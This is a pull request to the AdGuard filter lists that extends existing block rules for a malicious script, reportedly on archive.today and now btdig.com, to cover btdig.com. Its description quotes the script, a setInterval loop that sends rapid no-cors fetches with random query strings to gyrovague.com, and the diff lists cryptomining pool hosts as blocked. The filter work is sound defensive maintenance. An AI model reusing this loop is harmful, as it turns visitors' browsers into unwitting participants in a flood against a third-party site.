### PR TITLE
Block malicious code on btdig[.]com

### DIFF
--- a/BaseFilter/sections/cryptominers.txt
+++ b/BaseFilter/sections/cryptominers.txt
@@ -40,8 +40,8 @@
 ||dengiua.com/jquerys.js
 ||bilsh.com/jquerys.js
 !
-archive.fo,archive.is,archive.li,archive.md,archive.ph,archive.today,archive.vn#%#//scriptlet('prevent-setInterval', 'fetch')
-||gyrovague.com^$domain=archive.fo|archive.is|archive.li|archive.md|archive.ph|archive.today|archive.vn
+archive.fo,archive.is,archive.li,archive.md,archive.ph,archive.today,archive.vn,btdig.com#%#//scriptlet('prevent-setInterval', 'fetch')
+||gyrovague.com^$domain=archive.fo|archive.is|archive.li|archive.md|archive.ph|archive.today|archive.vn|btdig.com
 ||109.123.233.251^
 ||gulf.moneroocean.stream^
 ||pool.supportxmr.com^


### PR DESCRIPTION
# Creating the pull request

> Please include a summary of the change and which issue is fixed\
> If the related issue does not exist in our repository, please create it before making pull request\
> It is highly recommended to use our [Web Reporting Tool](https://kb.adguard.com/technical-support/reporting-tool) instead of creating an issue on GitHub directly\
> Please note, that we verify every pull request manually, so it may take time to apply it

## Prerequisites

### To avoid invalid pull requests, please check and confirm following terms

- [x] This is not an ad/bug report;
- [x] My code follows the [guidelines](https://github.com/AdguardTeam/AdguardFilters/blob/master/CONTRIBUTING.md) and [syntax](https://kb.adguard.com/general/how-to-create-your-own-ad-filters) of this project;
- [x] I have performed a self-review of my own changes;
- [x] My changes do not break web sites, apps and files structure.

## What problem does the pull request fix?

### If the problem does not fall under any category that is listed here, please write a comment below in corresponding section

- [ ] Missed ads or ad leftovers;
- [ ] Website or app doesn't work properly;
- [ ] AdGuard gets detected on a website;
- [ ] Missed analytics or tracker;
- [ ] Social media buttons — share, like, tweet, etc;
- [ ] Annoyances — pop-ups, cookie warnings, etc;
- [ ] Filters maintenance.

## What issue is being fixed?

There is no existing open issue, though this was discussed in private. This PR updates https://github.com/AdguardTeam/AdguardFilters/commit/99da51e8086cd7b6e8c9fe9617cdab189ad30b6b.

### Enter the issue address



### Add your comment and screenshots

The malicious code on archive.today/archive.is/etc is also on btdig.com, which is believed to be owned by the same person or persons:
<img width="960" height="480" alt="Screenshot 2026-01-25 012158" src="https://github.com/user-attachments/assets/58f66b2a-3c65-4817-86b9-d27f3a632089" />
<img width="960" height="488" alt="Screenshot 2026-01-26 151633" src="https://github.com/user-attachments/assets/1fe4adb2-e6ae-4316-a6fe-4fcd3da93802" />
It is unknown when the code was added, but it has been present for at least a week. Like archive.today, the malicious code is only present on the CAPTCHA page. Unlike archive.today, reproducing the CAPTCHA page is difficult; even when using Tor or a VPN, it is not guaranteed. Typically, the CAPTCHA appears when clicking the "about" link, though as stated this is not consistent. I have reproduced it in both Microsoft Edge and Firefox.
This is the malicious code:
```javascript
setInterval(function(){fetch("https://gyrovague.com/?s="+Math.random().toString(36).substring(2,3+Math.random()*8),{ referrerPolicy:"no-referrer",mode:"no-cors" });},300);
```
As the malicious code is the same as the code on archive.today, the existing filters should work.
Additional information can be provided in private if necessary.

### Terms

- [x] By submitting this issue, I agree that pull request does not contain private info and all conditions are met
